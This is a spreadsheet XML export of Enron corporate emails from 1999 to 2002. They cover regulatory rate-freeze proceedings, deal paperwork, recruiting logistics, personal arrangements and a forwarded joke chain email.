  <si>
    <t>RE: Feb 2</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 01/22/2001 11:51 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Brashear, Charlotte" &lt;cbrashear@velaw.com&gt; on 01/22/2001 11:26:02 AM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: Feb 2_x000D_
_x000D_
   I just noticed it's a Friday.  He's welcome to spend the night if_x000D_
you like, and I'll bring him home the next morning._x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Monday, January 22, 2001 11:12 AM_x000D_
To: cbrashear@velaw.com_x000D_
Subject: Feb 2_x000D_
_x000D_
_x000D_
Hi Charlotte,_x000D_
_x000D_
We've been invited to someone's house for dinner on Feb 2.  Can you take_x000D_
care of Michael?  The dinner is in River Oaks, so we could just drop him_x000D_
off._x000D_
_x000D_
Michael  got a hair cut this weekend.  I think it makes him look taller.  I_x000D_
wish it worked that way for me!  It is very short, and I think very cute._x000D_
_x000D_
Kay_x000D_
          ++++++CONFIDENTIALITY NOTICE+++++_x000D_
The information in this email may be confidential and/or privileged.  This_x000D_
email is intended to be reviewed by only the individual or organization_x000D_
named above.  If you are not the intended recipient or an authorized_x000D_
representative of the intended recipient, you are hereby notified that any_x000D_
review, dissemination or copying of this email and its attachments, if any,_x000D_
or the information contained herein is prohibited.  If you have received_x000D_
this email in error, please immediately notify the sender by return email_x000D_
and delete this email from your system.  Thank You_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 13:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'gordon.savage@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Audits and Surcharge Hearings - IMPLICATIONS FOR Rate Freeze Ending</t>
  </si>
  <si>
    <t xml:space="preserve">I wonder if there is a way to determine from the studies when the rate free=_x000D_
ze=20_x000D_
ended.  My logical is that at some point there was a crossover and maybe fr=_x000D_
om=20_x000D_
the cash flows we would be able to determine the outcome.  What does everyo=_x000D_
ne=20_x000D_
think?_x000D_
_x000D_
Jim_x000D_
_x000D_
----- Forwarded by James D Steffes/NA/Enron on 01/30/2001 09:21 PM -----_x000D_
_x000D_
=09Jeff Dasovich_x000D_
=09Sent by: Jeff Dasovich_x000D_
=0901/28/2001 09:01 PM_x000D_
=09=09=20_x000D_
=09=09 To: Harry Kingerski/NA/Enron@Enron, Tamara Johnson/HOU/EES@EES, Gord=_x000D_
on=20_x000D_
Savage/HOU/EES@EES, Wanda Curry/HOU/EES@EES, Mike D Smith/HOU/EES@EES, Vick=_x000D_
i=20_x000D_
Sharp/HOU/EES@EES, Scott Stoness/HOU/EES@EES, Donald M- ECT Origination=20_x000D_
Black/HOU/ECT@ECT, James D Steffes/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT=_x000D_
,=20_x000D_
Sandra McCubbin/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Susan J=20_x000D_
Mara/NA/Enron@ENRON, Robert C Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Rate Surcharge Proceedings Move Forward_x000D_
_x000D_
_x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 01/28/2001 08:59 PM -----_x000D_
_x000D_
=09"Daniel Douglass" &lt;Douglass@ArterHadden.com&gt;_x000D_
=0901/28/2001 01:23 PM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;Barbara_Klemstine@apsc.com&gt;, &lt;berry@apx.com&gt;, &lt;dcazalet@apx.com=_x000D_
&gt;,=20_x000D_
&lt;billr@calpine.com&gt;, &lt;jackp@calpine.com&gt;, &lt;glwaas@calpx.com&gt;,=20_x000D_
&lt;Ken_Czarnecki@calpx.com&gt;, &lt;gavaughn@duke-energy.com&gt;,=20_x000D_
&lt;rjhickok@duke-energy.com&gt;, &lt;gtbl@dynegy.com&gt;, &lt;jmpa@dynegy.com&gt;,=20_x000D_
&lt;jdasovic@enron.com&gt;, &lt;susan_j_mara@enron.com&gt;, &lt;Tamara_Johnson@enron.com&gt;,=_x000D_
=20_x000D_
&lt;curt.Hatton@gen.pge.com&gt;, &lt;foothill@lmi.net&gt;, &lt;camiessn@newwestenergy.com&gt;=_x000D_
,=20_x000D_
&lt;jcgardin@newwestenergy.com&gt;, &lt;jsmollon@newwestenergy.com&gt;,=20_x000D_
&lt;rsnichol@newwestenergy.com&gt;, &lt;Curtis_L_Kebler@reliantenergy.com&gt;,=20_x000D_
&lt;rllamkin@seiworldwide.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Rate Surcharge Proceedings Move Forward_x000D_
_x000D_
_x000D_
_x000D_
On Friday, the Commission issued the attached Assigned Commissioner's  Ruli=_x000D_
ng=20_x000D_
in the rate surcharge proceedings which does the following:_x000D_
?_x000D_
1.? It identifies the issues for Phase 1 as being:_x000D_
?_x000D_
(a) Reviewing the independent audit results of PG&amp;E and SCE, ordered in =20_x000D_
D.00-12-067 and, as part of that analysis, determining whether or not there=_x000D_
=20_x000D_
is a  financial necessity for other or additional relief for the utilities.=_x000D_
? =20_x000D_
Included here is a recognition that the utilities may make other interim =_x000D_
=20_x000D_
proposals and this would be included within the scope of the first phase;  =_x000D_
and_x000D_
?_x000D_
(b) TURN=01,s accounting proposal for the proper reconciliation of the =20_x000D_
Transition Revenue Account (TRA) and Transition Cost Balancing Account=20_x000D_
(TCBA)  accounts and the Generation Memorandum Accounts (GMA)._x000D_
?_x000D_
2.? The retention of utility generating assets and the interim  ratemaking=_x000D_
=20_x000D_
treatment for these assets is being separately handled and hearings  will n=_x000D_
ot=20_x000D_
occur on this issue in Phase 1.? Parties may file testimony on  interim=20_x000D_
valuation in addressing whether the rate freeze has ended on a  prospective=_x000D_
=20_x000D_
basis._x000D_
_x000D_
3.?? The Commission will consider whether the rate freeze has  ended only o=_x000D_
n=20_x000D_
a prospective basis in Phase I._x000D_
_x000D_
4.?? The Commission will address the reasonable and prudent  cost issue in =_x000D_
a=20_x000D_
later phase of this proceeding._x000D_
_x000D_
5.?? The  Commission will also consider parties=01, proposals for tiered ra=_x000D_
tes=20_x000D_
similar to  those discussed by Senator Bowen in the December public hearing=_x000D_
s._x000D_
?_x000D_
6.?? PG&amp;E and?Edison are required to?notify the  Commission and all parties=_x000D_
=20_x000D_
by January 30, 2001 of the specific portions of their  testimony that are=_x000D_
=20_x000D_
within the scope of this phase._x000D_
7. The hearing schedule adopted is:?=20_x000D_
_x000D_
February 5,  2001?????????????  Intervenor testimony served_x000D_
February 9,  2001?????????????  Rebuttal testimony served_x000D_
February 15 =01)21, 2001?????  Hearings_x000D_
February 23,  2001??????????? Closing  Argument_x000D_
February 27,  2001??????????? Briefs,  not to exceed 15 pages_x000D_
March 23,  2001????????????????Proposed  Decision_x000D_
March 26,  2001????????????????Final  Oral Argument_x000D_
March 27,  2001????????????????Anticipated  Final Commission Decision_x000D_
?_x000D_
Please let me know if anyone feels WPTF should be involved in this phase of=_x000D_
 =20_x000D_
the proceeding._x000D_
?_x000D_
Dan_x000D_
_x000D_
?_x000D_
 - CPUC01-#88123-v1-A0011038_ET_AL_Lynch_Walwyn_Ruling__.doc_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Jul 2001 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: CERA/UCLA Anderson report</t>
  </si>
  <si>
    <t>Great job on the Dunn letter, by the way!_x000D_
 -----Original Message-----_x000D_
From:  Dasovich, Jeff  _x000D_
Sent: Wednesday, July 11, 2001 4:10 PM_x000D_
To: Thome, Jennifer_x000D_
Subject: Re: CERA/UCLA Anderson report_x000D_
_x000D_
thanks.</t>
  </si>
  <si>
    <t>Tue, 26 Feb 2002 06:24:37 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tori.kuykendall@rweamericas.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Robin Barbe has been trying to call you.  Please call her at home.  Her number is 713-721-0709._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 05:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kent.miller@enron.com', 'dari.dornan@enron.com'})</t>
  </si>
  <si>
    <t>Guaranty</t>
  </si>
  <si>
    <t xml:space="preserve">Here it is.  Thanks. DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 06/06/2000 _x000D_
12:50 PM ---------------------------_x000D_
_x000D_
_x000D_
Wayne Kubicek &lt;wkubicek@sempratrading.com&gt; on 06/06/2000 11:32:51 AM_x000D_
To: "'dfossum@enron.com'" &lt;dfossum@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Guaranty_x000D_
_x000D_
_x000D_
In response to your request, I have attached the form of guaranty to be_x000D_
issued by Sempra Energy.  Regards. Wayne_x000D_
 &lt;&lt;NNG Guaranty.doc&gt;&gt;_x000D_
_x000D_
 - NNG Guaranty.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 07:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'miguel.garcia@enron.com', 'patrick.hanse@enron.com', 'chad.starnes@enron.com', 'joe.stepenovitch@enron.com', 'christopher.watts@enron.com', 'juan.padron@enron.com', 'doug.miller@enron.com', 'dean.laurent@enron.com', 'narsimha.misra@enron.com', 'cyril.price@enron.com', 'larry.campbell@enron.com', 'rudy.acevedo@enron.com', 'greg.trefz@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'benjamin.rogers@enron.com', 'larry.jester@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'joe.errigo@enron.com'})</t>
  </si>
  <si>
    <t>P&amp;L entries</t>
  </si>
  <si>
    <t>When entering deals into the P&amp;L please use the drop down box for the _x000D_
counterparties.  Rao has developed a comparison activity report that will _x000D_
compare enpower to the p&amp;l for us.  If we can enter our deals using the drop _x000D_
down  box then he can finish cleaning up the last few bugs so that we can get _x000D_
it into production in the next couple of days._x000D_
_x000D_
Thanks_x000D_
Kayne</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 11:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>4th Quarter Outlook - 11/17</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
FYI, here is the latest update on our Q4.  We are making headway and the list _x000D_
shows how we intend to make up the short fall.  As I stated on my voicemail _x000D_
yesterday, upon our return from the holiday,  I will be even more proactively _x000D_
managing the Q4 P&amp;L._x000D_
_x000D_
Have a great holiday._x000D_
mike_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 11/21/2000 _x000D_
06:56 PM ---------------------------_x000D_
_x000D_
_x000D_
Brent A Price_x000D_
11/20/2000 09:14 AM_x000D_
To: Mike McConnell/HOU/ECT@ECT, Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc: Thomas Myers/HOU/ECT@ECT _x000D_
Subject: 4th Quarter Outlook - 11/17_x000D_
_x000D_
Latest 4th Qtr. earnings outlook with changes from last week noted.  Call me _x000D_
if you have any questions._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 11:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'mark.taylor@enron.com', 'mhaedic@ect.enron.com'})</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Attached are two additional articles that address different aspects of_x000D_
operational risk.  The article entitled the Knowledge Factory talks about_x000D_
some of the issues we had originally discussed --the idea of creating a_x000D_
central respository of organiational know how._x000D_
_x000D_
_x000D_
I hope you find them of interest._x000D_
_x000D_
Charles_x000D_
__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com._x000D_
_x000D_
 - Front-Middle Office Relationships.pdf_x000D_
 - knowledge factory.pdf</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 16:11:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Phone Message:  Molly Magee  --J Ross is definitely interested</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sweet, Twanda  _x000D_
Sent:	Tuesday, August 14, 2001 2:27 PM_x000D_
To:	Cash, Michelle_x000D_
Subject:	Phone Message:  Molly Magee  --J Ross is definitely interested_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 09:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'john.viverito@enron.com', 'harry.collins@enron.com', 'peter.keohane@enron.com', 'shari.stack@enron.com', 'david.minns@enron.com', 'alan.aronowitz@enron.com', 'jane.mcbride@enron.com', 'jeffrey.hodge@enron.com', 'andrea.calo@enron.com', 'robbi.rossi@enron.com'})</t>
  </si>
  <si>
    <t>EOL approvals, 03-07-01</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 03/07/2001 05:30 PM -----_x000D_
_x000D_
	Walter Guidroz/ENRON@enronXgate_x000D_
	03/07/2001 05:22 PM_x000D_
		 _x000D_
		 To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate, _x000D_
Debbie R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli _x000D_
Campbell/ENRON@enronXgate, Cynthia Clark/ENRON@enronXgate, Enron Europe _x000D_
Global Contracts and Facilities@ENRON, Enron Europe Global _x000D_
CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tom _x000D_
Moran/ENRON@enronXgate, Claudia Clark/HOU/ECT@ECT, William S _x000D_
Bradford/ENRON@enronXgate, Lisa Lees/HOU/ECT@ECT, Juana _x000D_
Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, _x000D_
Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, _x000D_
Karen O'Day/NA/Enron@Enron, Tanya Rohauer/ENRON@enronXgate, Kelly _x000D_
Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron _x000D_
Communications, EOL Call Center@ENRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D _x000D_
Hare/HOU/ECT@ect, Amy Heffernan/Enron Communications@Enron Communications, _x000D_
Molly LaFuze/Enron Communications@Enron Communications, Danny Clark/Enron _x000D_
Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: EOL approvals, 03-07-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 10:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Wharton Interviews</t>
  </si>
  <si>
    <t xml:space="preserve">This is another reason why the HR and A/A program don't like each other.  _x000D_
It's absurd that our personnell functions don't share resources.  I'm almost _x000D_
of the opinion that these two groups should be folded together.  _x000D_
_x000D_
Jeff_x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 10/04/2000 _x000D_
05:58 PM ---------------------------_x000D_
From: Suzanne Farrow@EES on 10/04/2000 04:45 PM_x000D_
To: Kristin Gandy/NA/Enron@Enron_x000D_
cc: Jeffrey A Shankman/HOU/ECT@ECT _x000D_
Subject: Re: Wharton Interviews  _x000D_
_x000D_
Kate Wagner (Thunderbird) was supposed to have been taken off this list_x000D_
_x000D_
The list was also supposed to have been updated 2 months ago to reflect that _x000D_
Neville Ravji, Tiffany Wright, and Ben Creighton have left the company._x000D_
Betsy Bassis and Steve Pirozzi are physically located in London._x000D_
_x000D_
Are you sure you're pulling from the most up-to-date list?_x000D_
_x000D_
Suzanne_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kristin Gandy@ENRON_x000D_
10/04/2000 03:56 PM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT, Michael J Popkin/NA/Enron@Enron, Peggy _x000D_
Determeyer/Corp/Enron@Enron, Laura Howenstine/Enron Communications@Enron _x000D_
Communications, Bryan Kite/Enron Communications@Enron Communications, Michele _x000D_
Nezi Marvin/Enron Communications@Enron Communications, Neville Ravji/Enron _x000D_
Communications@Enron Communications, Suzanne Farrow/HOU/EES@EES, Sarah _x000D_
Wesner/Corp/Enron@Enron, Patrick Conner/HOU/ECT@ECT, Jayshree _x000D_
Desai/HOU/ECT@ECT, Tom Dutta/HOU/ECT@ECT, Matthew Goering/HOU/ECT@ECT, _x000D_
Kenneth Horton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kathleen _x000D_
Wagner/NA/Enron@Enron, Betsy Bassis/CA/Enron@Enron, Lisa _x000D_
Connolly/NA/Enron@Enron, Ben Creighton/Corp/Enron@ENRON, Brad _x000D_
Hitch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Colin Jackson/Enron _x000D_
Communications@Enron Communications, Gillian Johnson/NA/Enron@Enron, William _x000D_
Keeney/HOU/ECT@ECT, Jebong Lee/Enron Communications@Enron Communications, _x000D_
Stephen Pirozzi/LON/ECT@ECT, cwang2@enron.com, Tiffany Wright/Enron _x000D_
Communications@Enron Communications, Rodney Malcolm/HOU/ECT@ECT, Jennifer _x000D_
Fraser/HOU/ECT@ECT, John L Nowlan/HOU/ECT@ECT, Kyle Kitagawa/CAL/ECT@ECT, _x000D_
Natalie Halich/Enron Communications@Enron Communications, Sean A _x000D_
Holmes/HOU/EES@EES, Jordan Mintz/HOU/ECT@ECT, Li Sun/NA/Enron@Enron, Teresa _x000D_
Dyar/NA/Enron@Enron, Kyu-Bong Lee/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Wharton Interviews_x000D_
_x000D_
Hello Wharton/Penn Team!_x000D_
_x000D_
_x000D_
Can you believe interviews are just around the corner.  _x000D_
_x000D_
_x000D_
_x000D_
So that we are fully prepared for the November 9th and 10th interviews dates _x000D_
a team meeting will be held on:_x000D_
_x000D_
Monday October 9th at 2:00pm in room 11C2_x000D_
_x000D_
In the meeting we will review resumes that have been received for our _x000D_
pre-select list and coordinate any further campus events. Also, in the _x000D_
meeting we will select the people who will conduct first and second round _x000D_
interviews.  So if you would like to interview please plan on attending this _x000D_
meeting.   I look forward to seeing you all there._x000D_
_x000D_
Thank You,_x000D_
_x000D_
Kristin Gandy_x000D_
Associate Recruiter_x000D_
Associate/Analyst Program_x000D_
713-345-3214_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 04:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'priscilla.hamic@enron.com'})</t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
            The sitara deal # is 527410._x000D_
_x000D_
                                 Hope this helps!</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 09:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Redline of Sept6 vs. Sept19</t>
  </si>
  <si>
    <t xml:space="preserve">A comparison to ours._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 09/21/2000 04:03 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kay Mann                           09/21/2000 09:03 AM_x000D_
	_x000D_
_x000D_
To: Heather Kroll/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Redline of Sept6 vs. Sept19_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Aug 2001 14:34:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: ATCO Omnibus CW - HIGH PRIORITY***</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi, Greg!_x000D_
_x000D_
Wendy Conwell in Credit here in Houston forwarded this worksheet to us to prepare an omnibus confirmation for a deal between ECC and Atco Electric.  Since you guys are preparing confirms up there, I am forwarding the worksheet to you to prepare.  Francisco Pinto-Leite is marking up the counterparty form of guaranty and will forward it to you also._x000D_
_x000D_
Please let us know if you have any questions or need anything else._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie_x000D_
x33907_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Conwell, Wendy  _x000D_
Sent:	Wednesday, August 22, 2001 2:57 PM_x000D_
To:	Bailey, Susan; Heard, Marie; Panus, Stephanie_x000D_
Cc:	Law, Michael; Leite, Francisco Pinto; Bradford, William S.; Brown, Kortney; Ngo, Tracy; Radous, Paul; Rance, Susan; Sacks, Edward_x000D_
Subject:	ATCO Omnibus CW - HIGH PRIORITY***_x000D_
_x000D_
Please find attached the credit worksheet with credit terms to be incorporated into the financial Omnibus confirmation for financial deals done between ECC and Atco Electric.  Please note, these deals were done today pending credit and the confirmations are waiting to go out to the counterparty.  I have already spoken to Francisco about it so please forward the necessary documentation to him AS SOON AS POSSIBLE._x000D_
 _x000D_
_x000D_
_x000D_
Thanks so much for all your help!_x000D_
_x000D_
As always, I greatly appreciate it!_x000D_
Wendy _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 00:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'bryan.hull@enron.com', 'david.baumbach@enron.com', 'brian.hoskins@enron.com', 'phillip.love@enron.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'chad.landry@enron.com', 'matthew.lenhart@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Revenge is a sweet thing...</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 12/27/99 08:49 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Michael Ballases" &lt;mballases@hotmail.com&gt; on 12/20/99 01:20:10 AM_x000D_
To: ALargebicep@aol.com, douglo@hotmail.com, ezra@airmail.net, _x000D_
bhoskins@ect.enron.com, claydo40@hotmail.com, djcaudle@yahoo.com, Eric _x000D_
Bass/HOU/ECT@ECT, gfortunov@hotmail.com, gordomcc@rocketmail.com, Hector _x000D_
Campos/HOU/ECT@ECT, Jason.Bass2@compaq.com, Jennifer.Trapolino@aexp.com, _x000D_
lhunsmi@hotmail.com, Lenine Jeganathan/HOU/ECT@ECT, _x000D_
shelleyzee@mail.utexas.edu, msimpson@austinc.edu, rz411@hotmail.com, _x000D_
tjohnson@austinc.edu, westont@swbell.net_x000D_
cc:  _x000D_
Subject: Fwd: Revenge is a sweet thing..._x000D_
_x000D_
_x000D_
_x000D_
Read this--it's not that long!_x000D_
_x000D_
_x000D_
----Original Message Follows----_x000D_
From: "sheila ferrarini" &lt;sheilaferrarini@hotmail.com&gt;_x000D_
To: mballases@hotmail.com, moni_nejati@mail.bankone.com_x000D_
Subject: Fwd: Revenge is a sweet thing..._x000D_
Date: Sun, 19 Dec 1999 18:12:15 PST_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;From: "Desirae Thomas" &lt;desiraet@hotmail.com&gt;_x000D_
&gt;To: jbarreda@mhinc.com, abaragar@yahoo.com, daisy16737@aol.com,_x000D_
&gt;bdm23_99@yahoo.com, creame94@aol.com, cooperd_ci@hotmail.com,_x000D_
&gt;eliasha@flash.net, djbrown@centenary.edu, evaas@yahoo.com, holcombe@wt.net,_x000D_
&gt;deltasig@ghg.net, shadrunn@msn.com, jb2002ag@aol.com, cdr675@swbell.net,_x000D_
&gt;stdlln13@shsu.edu, leahs@flash.net, plug@aol.com, stdlav12@shsu.edu,_x000D_
&gt;acunnin517@aol.com, mrl5653@labs.tamu.edu, MW22222@aol.com,_x000D_
&gt;mbazan20@hotmail.com, melmar@mail.utexas.edu, stdmkh16@shsu.edu,_x000D_
&gt;patrickmahar@optelnow.net, parshi@yahoo.com, rey_moh@yahoo.com,_x000D_
&gt;sheilaferrarini@hotmail.com, slbut@aol.com, tazlvmarvn@aol.com,_x000D_
&gt;ajaxster@aol.com, ychatab@hotmail.com_x000D_
&gt;Subject: Revenge is a sweet thing..._x000D_
&gt;Date: Wed, 15 Dec 1999 00:15:51 CST_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Revenge is a sweet thing..._x000D_
&gt;_x000D_
&gt;Below is a true story that was in the local newspaper about a recent_x000D_
&gt;wedding that took place at Clemson University,South Carolina._x000D_
&gt;_x000D_
&gt;Even Jay Leno mentioned it:_x000D_
&gt;_x000D_
&gt;This was a huge wedding with about 300 guests.  After the wedding,_x000D_
&gt;at the reception, the groom got up on stage at the microphone to talk_x000D_
&gt;to the crowd. He said that he wanted to thank everyone for coming, many_x000D_
&gt;from long distances, to support them at their wedding. He especially wanted_x000D_
&gt;to thank the bride's and groom's families for coming and to thank his new_x000D_
&gt;father-in-law for providing such a fabulous_x000D_
&gt;reception. To thank everyone for coming and bringing gifts and_x000D_
&gt;everything, he said he wanted to give everyone a special gift from just_x000D_
&gt;him.  So taped to the bottom of everyone's chair was a manila envelope,_x000D_
&gt;including the wedding party.  He said that this was his gift to everyone,_x000D_
&gt;and told everyone to open the envelopes. Inside each manila envelope was an_x000D_
&gt;8 x 10 picture of his best man having sex with the bride.  He had gotten_x000D_
&gt;suspicious of the two of them and hired a private detective to trail them_x000D_
&gt;weeks prior to the wedding. After he stood there and watched the people's_x000D_
&gt;reactions for a couple of  minutes, he turned to the best man and said_x000D_
&gt;"F--- you", he turned to the bride and said "F--- you", and then he turned_x000D_
&gt;to the dumb founded_x000D_
&gt;crowd and said "I'm out of here." He had the marriage annulled first thing_x000D_
&gt;that Monday morning. While most of us would have broken off the engagement_x000D_
&gt;immediately after finding out about the affair, this guy goes through with_x000D_
&gt;it anyway as if nothing was wrong. His revenge:   Making the bride's_x000D_
&gt;parents pay over $32,000 for a 300 guest wedding and reception.  Letting_x000D_
&gt;everyone know exactly what did happen. And best of all, trashing the_x000D_
&gt;bride's and best man's reputations in front of all of their friends, their_x000D_
&gt;entire families,_x000D_
&gt;i.e. their parents, brothers, sisters, grandparents, nieces and_x000D_
&gt;nephews, etc. Yes, revenge when applied properly, like this way, can_x000D_
&gt;be sweet eh?_x000D_
&gt;_x000D_
_x000D_
_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 08:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alison.keogh@enron.com', 'marie.heard@enron.com', 'harry.collins@enron.com', 'john.viverito@enron.com', 'peter.keohane@enron.com', 'shari.stack@enron.com', 'jane.mcbride@enron.com', 'alan.aronowitz@enron.com', 'jeffrey.hodge@enron.com', 'andrea.calo@enron.com', 'robbi.rossi@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>EOL Credit Responses 12/20/00</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 12/20/2000 04:58 PM -----_x000D_
_x000D_
	Bradley Diebner_x000D_
	12/20/2000 04:53 PM_x000D_
		 _x000D_
		 To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Debbie _x000D_
R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, _x000D_
Cynthia Clark/Corp/Enron@ENRON, Mary G Gosnell/HOU/ECT@ECT, Enron Europe _x000D_
Global Contracts and Facilities, Enron Europe Global CounterParty, Stephanie _x000D_
Sever/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT, Stacey _x000D_
Richardson/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Adnan Patel/Corp/Enron@ENRON, _x000D_
Claudia Clark/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Lisa _x000D_
Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, _x000D_
Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Lee _x000D_
Munden/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, Karen O'Day/NA/Enron@Enron, Tanya _x000D_
Rohauer/HOU/ECT@ECT, Walter Guidroz/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: EOL Credit Responses 12/20/00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 07:54:00 -0800 (PST)</t>
  </si>
  <si>
